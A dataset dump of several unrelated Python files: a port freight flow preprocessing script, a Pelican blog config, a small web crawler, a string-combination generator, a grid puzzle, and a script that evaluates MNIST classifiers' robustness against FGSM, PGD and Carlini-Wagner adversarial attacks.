od_list.append({**{'origin_id':key.split('-')[0],'destination_id':key.split('-')[1]},**values})\n od_df = pd.DataFrame(od_list).fillna(0)\n od_df.to_csv(os.path.join(data_path,'OD_data','port_nodes_daily_ods.csv'),index=False,encoding='utf-8-sig')\n\n del od_list\n\n od_vals_group_industry = {}\n for iter_,row in od_dfs.iterrows():\n if '{}-{}'.format(row.origin_id,row.destination_id) not in od_vals_group_industry.keys():\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)] = {}\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['origin_province'] = row.origin_province\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['destination_province'] = row.destination_province\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['total_tons'] = row.tons\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)][row.industry_name] = row.tons\n else:\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['total_tons'] += row.tons\n\n if row.industry_name not in od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)].keys():\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)][row.industry_name] = row.tons\n else:\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)][row.industry_name] += row.tons\n\n od_list = []\n for key,values in od_vals_group_industry.items():\n od_list.append({**{'origin_id':key.split('-')[0],'destination_id':key.split('-')[1]},**values})\n od_df = pd.DataFrame(od_list).fillna(0)\n del od_list\n\n province_ods = od_df[['origin_province','destination_province']+industry_cols + ['total_tons']]\n province_ods = province_ods.groupby(['origin_province','destination_province'])[industry_cols + ['total_tons']].sum().reset_index()\n province_ods.to_csv(os.path.join(data_path,'OD_data','port_province_annual_ods.csv'),index=False,encoding='utf-8-sig')\n\n '''Add properties to port edges\n '''\n print ('* Creating port network with parameters')\n port_edges_path = os.path.join(incoming_data_path,\n 'pre_processed_network_data',\n 'ports',\n 'port_network',\n 'water_edges.shp')\n port_edges = gpd.read_file(port_edges_path,encoding='utf-8').fillna(0)\n port_edges.columns = map(str.lower, port_edges.columns)\n port_edges.rename(columns={'id':'edge_id','from_id':'from_node','to_id':'to_node'},inplace=True)\n port_edges = port_edges[['from_node','to_node','edge_id','geometry']]\n # get the right linelength\n port_edges['length'] = port_edges.geometry.apply(line_length)\n port_edges['min_speed'] = 4.0\n port_edges['max_speed'] = 5.0\n port_edges['min_time'] = port_edges['length']/port_edges['max_speed']\n port_edges['max_time'] = port_edges['length']/port_edges['min_speed']\n\n cost_df = pd.read_excel(os.path.join(incoming_data_path,'costs','port','port_costs.xlsx'),sheet_name='costs')\n port_edges['min_gcost'] = cost_df['min_cost'].values[0]\n port_edges['max_gcost'] = cost_df['max_cost'].values[0]\n port_edges.crs = {'init' :'epsg:4326'}\n\n port_edges.to_file(os.path.join(data_path,'network','port_edges.shp'),encoding = 'utf-8')\n port_edges.drop('geometry', axis=1, inplace=True)\n port_edges.to_csv(os.path.join(data_path,'network','port_edges.csv'),encoding='utf-8-sig',index=False)\n\n port_nodes.rename(columns={'id':'node_id'},inplace=True)\n port_nodes.to_file(os.path.join(data_path,'network','port_nodes.shp'),encoding = 'utf-8')\n port_nodes.drop('geometry', axis=1, inplace=True)\n port_nodes.to_csv(os.path.join(data_path,'network','port_nodes.csv'),encoding='utf-8-sig',index=False)\n\nif __name__ == '__main__':\n CONFIG = load_config()\n main(CONFIG)\n","sub_path":"src/atra/preprocess/port_od_flows.py","file_name":"port_od_flows.py","file_ext":"py","file_size_in_byte":21359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"133279526","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\n# Development pelican configuration file\n\nAUTHOR = 'Pierre-Luc Perrier'\nSITENAME = 'Pluc'\nSITEURL = ''\nRELATIVE_URLS = True\nDEFAULT_LANG = 'fr'\nTIMEZONE = 'Europe/Paris'\nTHEME = 'abzhack'\n\nPATH = 'content'\nCACHE_CONTENT = False\nLOAD_CONTENT_CACHE = False\n\nSUMMARY_MAX_LENGTH = 20\nDISPLAY_PAGES_ON_MENU=True\n\n# Pagination\n## The minimum number of articles allowed on the last page\nDEFAULT_ORPHANS = 1\n## The maximum number of articles to include on a page, not including\n## orphans. False to disable pagination.\nDEFAULT_PAGINATION = False\n# A set of patterns that are used to determine advanced pagination output.\n# PAGINATION_PATTERNS = (\n# (1, '{base_name}/', '{base_name}/index.html'),\n# (2, '{base_name}/page/{number}/', '{base_name}/page/{number}/index.html'),\n# )\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Disable tag generation\nTAGS_SAVE_AS = ''\nTAG_SAVE_AS = ''\n\n# Blogroll\nLINKS = ()\n\n# Social widget\nSOCIAL = (\n ('github', 'https://github.com/kode9'),\n ('stackoverflow', 'https://stackoverflow.com/users/1024122/thepluc'),\n)\n\n# Theme specific\nUSER_LOGO_URL='images/pluc.png'\nAUTO_REFRESH = False\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"238703553","text":"# from bs4 import BeautifulSoup\n# from urllib.request import urlopen\n#\n# # html = urlopen(\"https://baike.baidu.com/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711?fr=aladdin&fromid=22046949&fromtitle=%E7%88%AC%E8%99%AB\").read().decode(\"utf-8\")\n# print(html)\n# soup = BeautifulSoup(html,\"lxml\")\n#\n# all_href = soup.find_all(\"div\")\n# # all_href = [l['href'] for l in all_href]\n# print('\\n', all_href)\n\n\n# from bs4 import BeautifulSoup\n# from urllib.request import urlopen\n#\n# # if has Chinese, apply decode()\n# html = urlopen(\"https://morvanzhou.github.io/static/scraping/list.html\").read().decode('utf-8')\n# print(html)\n# soup = BeautifulSoup(html,'lxml')\n# month = soup.find_all('class')\n# month = [1 ['month'] for 1 in month]\n# print(month)\n\n\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport re\nimport random\n\n\nbase_url = \"https://baike.baidu.com\"\nhis = [\"/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711\"]\n\nurl = base_url + his[-1]\n\nhtml = urlopen(url).read().decode('utf-8')\nsoup = BeautifulSoup(html, features='lxml')\nprint(soup.find('h1').get_text(), ' url: ', his[-1])\n\n# find valid urls\nsub_urls = soup.find_all(\"a\", {\"target\": \"_blank\", \"href\": re.compile(\"/item/(%.{2})+$\")})\n\nif len(sub_urls) != 0:\n his.append(random.sample(sub_urls, 1)[0]['href'])\nelse:\n # no valid sub link found\n his.pop()\nprint(his)\n\n","sub_path":"WebCrawlerTest/beautifulSoupTest.py","file_name":"beautifulSoupTest.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"114503938","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n#-------------------------------------------------------------------------------\n# Name: module2\n# Purpose:\n#\n# Author: Jean\n#\n# Created: 04/03/2018\n# Copyright: (c) Jean 2018\n# Licence: \n#-------------------------------------------------------------------------------\n#!/usr/bin/python\ndef random1():\n import random\n lower_a = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n upper_a = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n num = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n\n all = []\n all = \" \".join(\"\".join(lower_a) + \"\".join(upper_a) + \"\".join(num))\n all = all.split()\n x = 1\n c = 1\n while x < 10:\n y = []\n for i in range(c):\n a = random.choice(all)\n y.append(a)\n print (\"\".join(y))\n x += 1\n c += 1\n\ndef random2():\n import itertools\n\n lower_a = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n upper_a = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n num = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n\n all = []\n all = lower_a + upper_a + num\n\n for r in range(1, 3):\n for s in itertools.product(all, repeat=r):\n print (''.join(s))\n\ndef random3():\n lower_a = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n upper_a = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n num = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n\n all = []\n all = lower_a + upper_a + num\n\n def recursive_product(myList, length, myString = \"\"):\n if length == 0:\n print (myString)\n return\n for c in myList:\n recursive_product(myList, length-1, myString + c)\n\n for r in range(1, 3):\n recursive_product(all, r)\n\ndef random4():\n from itertools import combinations\n\n symbols = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n \"abcdefghijklmnopqrstuvwxyz\"\n \"0123456789\"\n max_length = len(symbols)\n\n for length in range(1, max_length + 1):\n for word in map(''.join, combinations(symbols, length)):\n print (word)\n\ndef random5():\n from itertools import combinations, product\n\n symbols = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n \"abcdefghijklmnopqrstuvwxyz\"\n \"0123456789\"\n max_length = len(symbols)\n\n # generator of all combinations\n def words1(chars=symbols, max_len=max_length):\n for length in range(1, max_length + 1):\n for word in map(''.join, combinations(symbols, length)):\n yield word\n\n # generator of all combinations allowing repetitions\n def words2(chars=symbols, max_len=max_length):\n for length in range(1, max_length + 1):\n for word in map(''.join, product(*[symbols]*length)):\n yield word\n\n\n for word in words1(): #or words2\n #do something with word\n print (word)\n\ndef main():\n random5()\n\nif __name__ == '__main__':\n main()\n","sub_path":"combinations of string symbols.py","file_name":"combinations of string symbols.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"140571069","text":"def find_distance_dfs(grid, i, j, rows, columns, dist, tracker):\n if (i, j) in tracker:\n return dist[i][j]\n if min(i, j) < 0 or i >= rows or j >= columns:\n return float('inf')\n if dist[i][j] != float('inf'):\n return dist[i][j]\n tracker.add((i, j))\n min_d = min(find_distance_dfs(grid, i+1, j, rows, columns, dist, tracker),\n find_distance_dfs(grid, i, j + 1, rows,\n columns, dist, tracker),\n find_distance_dfs(grid, i-1, j, rows, columns, dist, tracker),\n find_distance_dfs(grid, i, j-1, rows, columns, dist, tracker)) + 1\n dist[i][j] = min_d\n return min_d\n\n\ndef minimumDays(rows, columns, grid):\n # WRITE YOUR CODE HERE\n dist = [[float('inf') for _ in range(columns)] for _ in range(rows)]\n\n for i in range(rows):\n for j in range(columns):\n if grid[i][j] == 1:\n # dist[i][j] = 1\n dist[i][j] = 0\n result = []\n remaining = []\n for i in range(rows):\n for j in range(columns):\n if grid[i][j] == 0 and dist[i][j] == float('inf'):\n find_distance_dfs(grid, i, j, rows, columns, dist, set())\n\n print(dist)\n return max([max(x) for x in dist])\n\n\nprint(minimumDays(5, 5, [[1, 0, 0, 0, 0], [0, 1, 0, 0, 0], [\n 0, 0, 1, 0, 0], [0, 0, 0, 1, 0], [0, 0, 0, 0, 1]]))\n","sub_path":"Python_Projects/6-Google codejam/139_find_min_days.py","file_name":"139_find_min_days.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"211783153","text":"import sys\nsys.path.append('.')\n\nimport os\nimport time\nimport setproctitle\n\nimport numpy as np\nimport tensorflow as tf\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\nimport cleverhans\nfrom cleverhans.attacks import CarliniWagnerL2\nfrom cleverhans.attacks import ProjectedGradientDescent\nfrom cleverhans.attacks import FastGradientMethod\nfrom cleverhans.model import CallableModelWrapper\nfrom cleverhans.utils import AccuracyReport\nfrom cleverhans.utils_pytorch import convert_pytorch_model_to_tf\n\n\nfrom examples.transfer_mnist import select_model, argparser\nfrom convex_adversarial import robust_loss, robust_loss_transfer\nimport examples.problems as pblm\nfrom examples.trainer import AverageMeter\n\n\nDEBUG = False\nparams = {\n 'cuda_ids': 1,\n 'batch_size': 128,\n 'robust_batch_size': 50,\n 'robust_transfer_batch_size': 30,\n 'actual_attack_batch_size': 400\n}\n\nCW_LEARNING_RATE = .2\nCW_ATTACK_ITERATIONS = 100\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\n\n## -------\n\n\n\ndef evaluate(loader, model, apply_func, log, verbose):\n batch_time = AverageMeter()\n losses = AverageMeter()\n errors = AverageMeter()\n\n end = time.time()\n\n for i, (X,y) in enumerate(loader):\n X,y = X.cuda(), y.cuda().long()\n if apply_func is not None:\n X,y = apply_func(model, X, y)\n if y.dim() == 2:\n y = y.squeeze(1)\n\n with torch.no_grad():\n out = model(Variable(X))\n ce = nn.CrossEntropyLoss()(out, Variable(y))\n err = (out.max(1)[1] != y).float().sum() / X.size(0)\n\n # measure accuracy and record loss\n losses.update(ce.item(), X.size(0))\n errors.update(err.item(), X.size(0))\n\n # measure elapsed time\n batch_time.update(time.time()-end)\n end = time.time()\n\n # print(i, ce.item(), err.item(), file=log)\n\n if verbose:\n endline = '\\n' if i % verbose == 0 else '\\r'\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Error {errors.val:.3f} ({errors.avg:.3f})'.format(\n i, len(loader), batch_time=batch_time,\n loss=losses, errors=errors), end=endline)\n log.flush()\n\n del X, y, out, ce, err\n if DEBUG and i == 10:\n break\n return losses.avg, errors.avg\n\n\ndef evaluate_robust(loader, model, epsilon, log, verbose):\n batch_time = AverageMeter()\n robust_losses = AverageMeter()\n robust_errors = AverageMeter()\n\n end = time.time()\n\n torch.set_grad_enabled(False)\n for i, (X,y) in enumerate(loader):\n X,y = X.cuda(), y.cuda().long()\n if y.dim() == 2:\n y = y.squeeze(1)\n\n robust_ce, robust_err = robust_loss(model, epsilon, X, y)\n\n # measure accuracy and record loss\n robust_losses.update(robust_ce.item(), X.size(0))\n robust_errors.update(robust_err, X.size(0))\n\n # measure elapsed time\n batch_time.update(time.time()-end)\n end = time.time()\n\n # print(i, robust_ce.item(), robust_err, file=log)\n\n if verbose:\n endline = '\\n' if i % verbose == 0 else '\\r'\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Robust loss {rloss.val:.3f} ({rloss.avg:.3f})\\t'\n 'Robust error {rerrors.val:.3f} ({rerrors.avg:.3f})'.format(\n i, len(loader), batch_time=batch_time,\n rloss = robust_losses, rerrors = robust_errors), end=endline)\n log.flush()\n\n del X, y, robust_ce\n if DEBUG and i == 10:\n break\n torch.set_grad_enabled(True)\n torch.cuda.empty_cache()\n return robust_losses.avg, robust_errors.avg\n\n\ndef evaluate_transfer_robust(loader, t_model, model, epsilon, adaptive_vp_rate, log, verbose,\n real_time=False, evaluate=False, clip_grad=None, **kwargs):\n\n batch_time = AverageMeter()\n robust_losses = AverageMeter()\n robust_errors = AverageMeter()\n vp_rates = AverageMeter()\n invp_rates = AverageMeter()\n\n end = time.time()\n for i, (X,y) in enumerate(loader):\n X,y = X.cuda(), y.cuda().long()\n if y.dim() == 2:\n y = y.squeeze(1)\n\n robust_ce, robust_err, _, _, v_point_rate, eta, inv_point_rate = \\\n robust_loss_transfer(model, t_model, epsilon,\n Variable(X), Variable(y), **kwargs)\n\n # measure accuracy and record loss\n robust_losses.update(robust_ce.detach().item(), X.size(0))\n robust_errors.update(robust_err, X.size(0))\n vp_rates.update(v_point_rate, X.size(0))\n invp_rates.update(inv_point_rate, X.size(0))\n\n # measure elapsed time\n batch_time.update(time.time()-end)\n end = time.time()\n\n # print(i, robust_ce.detach().item(), robust_err, v_point_rate, inv_point_rate, file=log)\n\n if verbose:\n endline = '\\n' if i % verbose == 0 else '\\r'\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'T Robust loss {rloss.val:.4f} ({rloss.avg:.4f})\\t'\n 'T Robust error {rerrors.val:.3f} ({rerrors.avg:.3f})\\t'\n 'VP Rate {vp_rate.val: .3f} ({vp_rate.avg:.3f})\\t'\n 'INVP Rate {invp_rate.val: .3f} ({invp_rate.avg:.3f})\\t'.format(\n i, len(loader), batch_time=batch_time,\n vp_rate=vp_rates, invp_rate=invp_rates,\n rloss=robust_losses, rerrors=robust_errors), end=endline)\n\n log.flush()\n\n del X, y, robust_ce, robust_err\n if DEBUG and i == 10:\n break\n torch.cuda.empty_cache()\n return robust_losses.avg, robust_errors.avg, vp_rates.avg, invp_rates.avg\n\n\ndef test_transferability(loader, attack_method, epsilon, torch_model1, torch_model2, verbose, batch_size):\n batch_time = AverageMeter()\n err11s = AverageMeter()\n err12s = AverageMeter()\n err21s = AverageMeter()\n err22s = AverageMeter()\n\n end = time.time()\n\n sess = tf.Session(config=config)\n x_op = tf.placeholder(tf.float32, shape=(None, 1, 28, 28,))\n\n # Convert pytorch model to a tf_model and wrap it in cleverhans\n tf_model_fn1 = convert_pytorch_model_to_tf(torch_model1)\n if torch_model2 is not None:\n tf_model_fn2 = convert_pytorch_model_to_tf(torch_model2)\n\n # Attack Parameters\n if attack_method == 'CW':\n params = {'binary_search_steps': 1,\n # 'y': None,\n 'max_iterations': CW_ATTACK_ITERATIONS,\n 'learning_rate': CW_LEARNING_RATE,\n 'batch_size': batch_size,\n 'initial_const': 10}\n elif attack_method == 'PGD':\n params = {'eps': epsilon,\n 'clip_min': 0.,\n 'clip_max': 1.,\n 'eps_iter': 0.005,\n 'nb_iter': 100,\n 'rand_init': False}\n elif attack_method == 'FGSM':\n params = {'eps': epsilon,\n 'clip_min': 0.,\n 'clip_max': 1.}\n else:\n raise Exception('Unknown attack method %s'.format(attack_method))\n\n # Model1 --> Model2\n cleverhans_model1 = CallableModelWrapper(tf_model_fn1, output_layer='logits')\n if torch_model2 is not None:\n cleverhans_model2 = CallableModelWrapper(tf_model_fn2, output_layer='logits')\n\n # Create an attack\n if attack_method == 'CW':\n attk1 = CarliniWagnerL2(cleverhans_model1, sess=sess)\n if attack_method == 'PGD':\n attk1 = ProjectedGradientDescent(cleverhans_model1, sess=sess)\n if attack_method == 'FGSM':\n attk1 = FastGradientMethod(cleverhans_model1, sess=sess)\n if torch_model2 is not None:\n if attack_method == 'CW':\n attk2 = CarliniWagnerL2(cleverhans_model2, sess=sess)\n if attack_method == 'PGD':\n attk2 = ProjectedGradientDescent(cleverhans_model2, sess=sess)\n if attack_method == 'FGSM':\n attk2 = FastGradientMethod(cleverhans_model2, sess=sess)\n\n adv_x_op1 = attk1.generate(x_op, **params)\n if torch_model2 is not None:\n adv_x_op2 = attk2.generate(x_op, **params)\n\n # Test on model1 and model2\n adv_preds_op11 = tf_model_fn1(adv_x_op1)\n if torch_model2 is not None:\n adv_preds_op12 = tf_model_fn2(adv_x_op1)\n adv_preds_op21 = tf_model_fn1(adv_x_op2)\n adv_preds_op22 = tf_model_fn2(adv_x_op2)\n\n for i, (xs, ys) in enumerate(loader):\n if torch_model2 is not None:\n (adv_preds11, adv_preds12) = sess.run((adv_preds_op11, adv_preds_op12), feed_dict={x_op: xs})\n (adv_preds21, adv_preds22) = sess.run((adv_preds_op21, adv_preds_op22), feed_dict={x_op: xs})\n err11 = float((np.argmax(adv_preds11, axis=1) != ys).sum()) / xs.size(0)\n err12 = float((np.argmax(adv_preds12, axis=1) != ys).sum()) / xs.size(0)\n err21 = float((np.argmax(adv_preds21, axis=1) != ys).sum()) / xs.size(0)\n err22 = float((np.argmax(adv_preds22, axis=1) != ys).sum()) / xs.size(0)\n err11s.update(err11, xs.size(0))\n err12s.update(err12, xs.size(0))\n err21s.update(err21, xs.size(0))\n err22s.update(err22, xs.size(0))\n else:\n adv_preds11 = sess.run((adv_preds_op11), feed_dict={x_op: xs})\n err11 = float((np.argmax(adv_preds11, axis=1) != ys).sum()) / xs.size(0)\n err11s.update(err11, xs.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n\n if verbose:\n endline = '\\n' if i % verbose == 0 else '\\r'\n if torch_model2 is not None:\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'error 1->1 {err11.val:.3f} ({err11.avg:.3f})\\t'\n 'error 1->2 {err12.val:.3f} ({err12.avg:.3f})\\t'\n 'error 2->1 {err21.val:.3f} ({err21.avg:.3f})\\t'\n 'error 2->2 {err22.val:.3f} ({err22.avg:.3f})\\t'.format(\n i, len(loader), batch_time=batch_time,\n err11=err11s, err12=err12s, err21=err21s, err22=err22s), end=endline)\n else:\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'error {err11.val:.3f} ({err11.avg:.3f})\\t'.format(\n i, len(loader), batch_time=batch_time,\n err11=err11s), end=endline)\n\n sess.close()\n if torch_model2 is not None:\n return err11s.avg, err12s.avg, err21s.avg, err22s.avg\n else:\n return err11s.avg\n\n\ndef test_transferability_subset(loader, attack_method, epsilon, torch_model1, torch_model2, verbose, batch_size):\n batch_time = AverageMeter()\n err12s = AverageMeter()\n err21s = AverageMeter()\n\n end = time.time()\n\n sess = tf.Session(config=config)\n x_op = tf.placeholder(tf.float32, shape=(None, 1, 28, 28,))\n\n # Convert pytorch model to a tf_model and wrap it in cleverhans\n tf_model_fn1 = convert_pytorch_model_to_tf(torch_model1)\n tf_model_fn2 = convert_pytorch_model_to_tf(torch_model2)\n\n # Attack Parameters\n if attack_method == 'CW':\n params = {'binary_search_steps': 1,\n # 'y': None,\n 'max_iterations': CW_ATTACK_ITERATIONS,\n 'learning_rate': CW_LEARNING_RATE,\n 'batch_size': batch_size,\n 'initial_const': 10}\n elif attack_method == 'PGD':\n params = {'eps': epsilon,\n 'clip_min': 0.,\n 'clip_max': 1.,\n 'eps_iter': 0.005,\n 'nb_iter': 100,\n 'rand_init': False}\n elif attack_method == 'FGSM':\n params = {'eps': epsilon,\n 'clip_min': 0.,\n 'clip_max': 1.}\n else:\n raise Exception('Unknown attack method %s'.format(attack_method))\n\n # Model1 --> Model2\n cleverhans_model1 = CallableModelWrapper(tf_model_fn1, output_layer='logits')\n cleverhans_model2 = CallableModelWrapper(tf_model_fn2, output_layer='logits')\n\n # Create an attack\n if attack_method == 'CW':\n attk1 = CarliniWagnerL2(cleverhans_model1, sess=sess)\n if attack_method == 'PGD':\n attk1 = ProjectedGradientDescent(cleverhans_model1, sess=sess)\n if attack_method == 'FGSM':\n attk1 = FastGradientMethod(cleverhans_model1, sess=sess)\n\n if attack_method == 'CW':\n attk2 = CarliniWagnerL2(cleverhans_model2, sess=sess)\n if attack_method == 'PGD':\n attk2 = ProjectedGradientDescent(cleverhans_model2, sess=sess)\n if attack_method == 'FGSM':\n attk2 = FastGradientMethod(cleverhans_model2, sess=sess)\n\n adv_x_op1 = attk1.generate(x_op, **params)\n adv_x_op2 = attk2.generate(x_op, **params)\n\n # Test on model1 and model2\n adv_preds_op11 = tf_model_fn1(adv_x_op1)\n adv_preds_op12 = tf_model_fn2(adv_x_op1)\n adv_preds_op21 = tf_model_fn1(adv_x_op2)\n adv_preds_op22 = tf_model_fn2(adv_x_op2)\n\n for i, (xs, ys) in enumerate(loader):\n (adv_preds11, adv_preds12) = sess.run((adv_preds_op11, adv_preds_op12), feed_dict={x_op: xs})\n (adv_preds21, adv_preds22) = sess.run((adv_preds_op21, adv_preds_op22), feed_dict={x_op: xs})\n cnt11 = int((np.argmax(adv_preds11, axis=1) != ys).sum())\n cnt22 = int((np.argmax(adv_preds22, axis=1) != ys).sum())\n if cnt11 > 0:\n err12 = float(((np.argmax(adv_preds12, axis=1) != ys) * (np.argmax(adv_preds11, axis=1) != ys)).sum()) / float(cnt11)\n err12s.update(err12, cnt11)\n if cnt22 > 0:\n err21 = float(((np.argmax(adv_preds22, axis=1) != ys) * (np.argmax(adv_preds21, axis=1) != ys)).sum()) / float(cnt22)\n err21s.update(err21, cnt22)\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if verbose:\n endline = '\\n' if i % verbose == 0 else '\\r'\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'error 1->2 {err12.val:.3f} ({err12.avg:.3f})\\t'\n 'error 2->1 {err21.val:.3f} ({err21.avg:.3f})\\t'.format(\n i, len(loader), batch_time=batch_time,\n err12=err12s, err21=err21s), end=endline)\n\n sess.close()\n return err12s.avg, err21s.avg\n\n\nos.environ['CUDA_VISIBLE_DEVICES'] = str(params['cuda_ids'])\nif __name__ == '__main__':\n\n args = argparser()\n model = dict()\n for m_type in ['M1', 'M1P', 'M2P', 'M2PM', 'M2', 'M2M']:\n weight_path = None\n if m_type == 'M1':\n _psbl_path = args.M1_prefix + '_best.pth'\n elif m_type == 'M1P':\n _psbl_path = args.M1P_prefix + '_best.pth'\n elif m_type == 'M2P':\n _psbl_path = args.M2P_prefix + '_best.pth'\n elif m_type == 'M2PM':\n _psbl_path = args.M2PM_prefix + '_best.pth'\n elif m_type == 'M2':\n _psbl_path = args.M2_prefix + '_best.pth'\n elif m_type == 'M2M':\n _psbl_path = args.M2_prefix + '_mutual_model_best.pth'\n if os.path.exists(_psbl_path):\n model[m_type] = select_model(args.model)\n model[m_type].load_state_dict(torch.load(_psbl_path)['state_dict'])\n\n _, test_loader = pblm.mnist_loaders(params['batch_size'])\n _, robust_test_loader = pblm.mnist_loaders(params['robust_batch_size'])\n _, robust_transfer_test_loader = pblm.mnist_loaders(params['robust_transfer_batch_size'])\n _, actual_test_loader = pblm.mnist_loaders(params['actual_attack_batch_size'])\n\n res_log = open(args.prefix + '_test.txt', \"w\")\n setproctitle.setproctitle('test_clean_accuracy')\n print('Clean accuracy')\n print('Clean accuracy', file=res_log)\n for k in model:\n losses, errors = evaluate(test_loader, model[k], None, res_log, 10)\n print('\\n')\n print(k, 'loss', losses, 'error', errors)\n print(k, 'loss', losses, 'error', errors, file=res_log)\n\n setproctitle.setproctitle('test_robust_bound')\n print('Robust bound')\n print('Robust bound', file=res_log)\n for k in model:\n losses, errors = evaluate_robust(robust_test_loader, model[k], args.epsilon, res_log, 10)\n print('\\n')\n print(k, 'loss', losses, 'error', errors)\n print(k, 'loss', losses, 'error', errors, file=res_log)\n res_log.flush()\n\n # res_trans_log = open('test.trans.log', \"w\")\n # setproctitle.setproctitle('test_transfer_bound')\n # print('Transfer bound')\n # print('Transfer bound', file=res_trans_log)\n # for e in [0.1, 0.3]:\n # # robust_bound\n # m1 = model_set[('N', e)]\n # for t in ['NP', 'T', 'TB']:\n # m2 = model_set[(t, e)]\n # losses, errors, vprates, invprates = evaluate_transfer_robust(robust_transfer_test_loader, m1, m2, e, None, res_trans_log, 10)\n # print(t, e, losses, errors, vprates, invprates, file=res_trans_log)\n # res_trans_log.flush()\n\n res_attack_log = open(args.prefix + '_test.attack.txt', \"w\")\n setproctitle.setproctitle('actual_white_attack')\n print('actual_white_attack', file=res_attack_log)\n print('actual_white_attack')\n for attack_method in ['FGSM', 'PGD']:\n print(attack_method)\n print(attack_method, file=res_attack_log)\n for k in model:\n m = model[k]\n err = test_transferability(actual_test_loader, attack_method, args.epsilon, m, None, 10,\n params['actual_attack_batch_size'])\n print(k, attack_method, 'err', err)\n print(k, attack_method, 'err', err, file=res_attack_log)\n setproctitle.setproctitle('actual_transfer_attack')\n print('actual_transfer_attack', file=res_attack_log)\n print('actual_transfer_attack')\n for attack_method in ['FGSM', 'PGD']:\n print(attack_method)\n print(attack_method, file=res_attack_log)\n appeared = set()\n for s, t in [('M1', 'M1P'), ('M2P', 'M2PM'), ('M2', 'M2M')]:\n # for s in model:\n # for t in model:\n if s == t:\n break\n # if (s, t) in appeared and (t, s) in appeared:\n # break\n m1 = model[s]\n m2 = model[t]\n _, err12, err21, _ = test_transferability(actual_test_loader, attack_method, args.epsilon, m1, m2, 10,\n params['actual_attack_batch_size'])\n print(attack_method, s, '->', t, err12, t, '->', s, err21)\n print(attack_method, s, '->', t, err12, t, '->', s, err21, file=res_attack_log)\n err12, err21 = test_transferability_subset(actual_test_loader, attack_method, args.epsilon, m1, m2, 10,\n params['actual_attack_batch_size'])\n\n print(attack_method, 'subset', s, '->', t, err12, t, '->', s, err21)\n print(attack_method, 'subset', s, '->', t, err12, t, '->', s, err21, file=res_attack_log)\n appeared.add((s, t))\n appeared.add((t, s))\n res_attack_log.flush()\n\n # res_trans_bound_log = open('test.trans.rev.log', \"w\")\n # 